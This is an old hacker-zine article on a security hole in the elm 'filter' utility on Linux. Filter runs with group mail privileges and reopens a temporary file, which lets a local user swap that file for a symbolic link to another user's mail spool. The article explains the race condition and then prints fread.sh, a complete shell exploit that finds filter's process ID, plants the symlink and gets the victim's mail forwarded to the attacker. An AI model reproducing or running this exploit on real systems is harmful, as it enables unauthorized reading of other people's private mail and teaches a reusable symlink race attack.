home *** CD-ROM | disk | FTP | other *** search
-
-
-
-
-
-
- Linux 'filter' Security Holes
-
- by FEH Staff
-
-
-
- The elm filter under linux runs sugrp mail, thus allowing it to freely
-
- read and write from users mail spools. It is only through the integrity
-
- of its code that the security of linux's mail system is protected; and in
-
- this respect it falls short. In FEH #2, we printed mail-clobber, code
-
- that exploited filter in order to destroy a user's mail spool. But, the
-
- capabilities to exploit filter extend beyond destruction of a mail spool,
-
- you can also use it to read a mail spool.
-
- The specific problem that is exploited in this hole is the way filter
-
- uses a temporary file to store the input to it, and then subsequently send
-
- it back out according to the filter. Because of the modularity of the
-
- coding, in the main filter.c, the temporary file is opened, and then written
-
- to; after which it is closed. The mailmessage function is then called, with
-
- the purpose of forwarding that mail, written to the temporary file, to
-
- whatever destination is specified in the filter. At the start of this
-
- process, the temporary file is opened, and the contents of it are dumped
-
- to the mail spool of the user the mail is being forwarded to.
-
- At any point after the file has been initially opened by the main filter
-
- function, since the user running filter has permissions on that temp file,
-
- it can be rm'd. The temp file existing can then be replaced with a symbolic
-
- link to any file that group mail has read permissions on. When it is opened
-
- in the mailmessage function, the symbolic link is followed and whatever file
-
- that was pointed to will be read in, and the contents forwarded to the user
-
- specified in the mail spool.
-
- The complete exploit is shown below:
-
-
-
- Program: filter, an elm utility
-
- Affected Operating Systems: linux
-
- Requirements: account on machine
-
- Security Compromise: user can read any mail spool readable by grp mail.
-
- (usually everything, sometimes not root)
-
- Synopsis: filter writes out the mail to be forwarded to a
-
- temporary file, which is then closed and reopened;
-
- if when the temporary file is reopened it is a
-
- symlink to a mail spool, filter will proceed
-
- to forward the contents of that file as if it was
-
- the original message.
-
-
-
- fread.sh:
-
- #!/bin/sh
-
- echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp
-
- echo From: ReDragon > /tmp/fread-msg.tmp
-
- echo To: $LOGNAME >> /tmp/fread-msg.tmp
-
- echo Subject: Filter Exploit >> /tmp/fread-msg.tmp
-
- echo sleep 2 > /tmp/fread-sh.tmp
-
- echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
-
- chmod +x /tmp/fread-sh.tmp
-
- /tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
-
- FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
-
- rm -f /tmp/filter.$FREAD
-
- ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
-
- sleep 2
-
- rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD
-
- FREAD=
-
-
